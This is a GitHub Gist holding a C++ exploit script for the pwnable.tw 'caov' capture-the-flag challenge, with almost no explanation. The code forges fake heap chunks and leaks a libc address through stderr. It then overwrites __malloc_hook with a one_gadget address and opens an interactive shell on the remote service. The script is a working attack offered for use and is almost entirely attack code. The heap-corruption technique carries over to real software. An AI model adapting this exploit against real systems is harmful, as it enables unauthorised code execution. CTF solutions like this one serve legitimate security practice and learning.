Created
February 13, 2021 22:38
-
-
Save hkraw/435dfa3dd6525c2b72ce9c0b8e5dcb71 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <pwntools> | |
#include <string> | |
#include <iostream> | |
using namespace pwn; | |
// Process io("./caov"); | |
Remote io("chall.pwnable.tw", 10306); | |
void set(std::string name, std::string key, | |
uint32_t keyLen, int64_t value) { | |
io.sendlineafter("choice: ", "2"); | |
io.sendafter("name: ",name); | |
io.sendlineafter("length: ",std::to_string(keyLen)); | |
if(keyLen == 0) { return ;} | |
io.sendlineafter("Key: ",key); | |
io.sendlineafter("Value: ",std::to_string(value)); | |
} | |
struct Data { | |
char *key; | |
uint64_t value; | |
uint64_t change_count; | |
int year, month, day, hour, min, sec; | |
}; | |
uint64_t offset_Data = 0x6032a0; | |
uint64_t offset_Name = offset_Data + 0x20; | |
uint64_t junk = 0x41414141; | |
uint64_t fake_chunk_addr = 0x603285; | |
int main() { | |
io.recvuntil("name: "); | |
io.sendline("HKHK"); | |
io.sendlineafter("key: ", "HK"); | |
io.sendlineafter("value: ",std::to_string(0x1337)); | |
/* set( name, key , keyLen, val) */ | |
std::string payload; | |
payload = flat( | |
0UL, 0x71UL, | |
offset_Data, 0UL, | |
0UL, 0x21UL, | |
junk, junk, | |
junk, junk, | |
junk, junk, | |
offset_Name+0x10, 0L, | |
junk, 0x81L, | |
0L, 0x21L, | |
"\n" | |
); set(payload, "HKHK", 0 , 0); // 0 | |
payload = flat( | |
0L, 0x71L, | |
fake_chunk_addr, 0L, | |
0L, 0L, | |
fake_chunk_addr - 0x5, junk, | |
junk, junk, | |
junk, junk, | |
0L, "\n" | |
); set(payload, "HK\n", 0x67, 0); //1 | |
std::string payload2(11, 0); | |
payload2 += flat(offset_Name + 0x30); | |
set("HK\n",payload2,0x67,0); //2 | |
io.sendlineafter("choice: ","1"); | |
io.recvuntil("Key: "); | |
std::string leak_str = io.recv(6); | |
leak_str.resize(8); | |
uint64_t libc_stderr_leak = u64(leak_str); | |
uint64_t libc_base = libc_stderr_leak - 0x3c4540; | |
uint64_t offset_malloc_hook = 0x3c3b10; | |
printf("[+] Libc base: %p\n",(void *)libc_base); | |
std::string final_payload_1; | |
final_payload_1 = flat( | |
0UL, 0x71UL, | |
offset_Data, 0UL, | |
0UL, 0x21UL, | |
fake_chunk_addr - 0x5, junk, | |
junk, 0x21L, | |
junk, junk, | |
offset_Name+0x10, 0L, | |
junk, 0x81L, | |
0L, 0x21L, | |
"\n" | |
); set(final_payload_1, "hk", 0, 0); | |
std::string final_payload_2; | |
final_payload_2 = flat( | |
0UL, 0x71UL, | |
libc_base + offset_malloc_hook - 0x23, 0L, | |
0UL, 0x21UL, | |
offset_Name + 0x20, junk, | |
junk, 0x21L, | |
"\n" | |
); | |
set(final_payload_2, "hk",0,0); | |
set("hk\n","hk\n",0x67,0); | |
uint64_t one_gadget = libc_base + 0xef6c4; | |
std::string malloc_hook_overwrite; | |
malloc_hook_overwrite = flat( | |
"AAA", junk, junk, | |
one_gadget | |
);set("hk\n",malloc_hook_overwrite, 0x67, 0); | |
io.interactive(); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment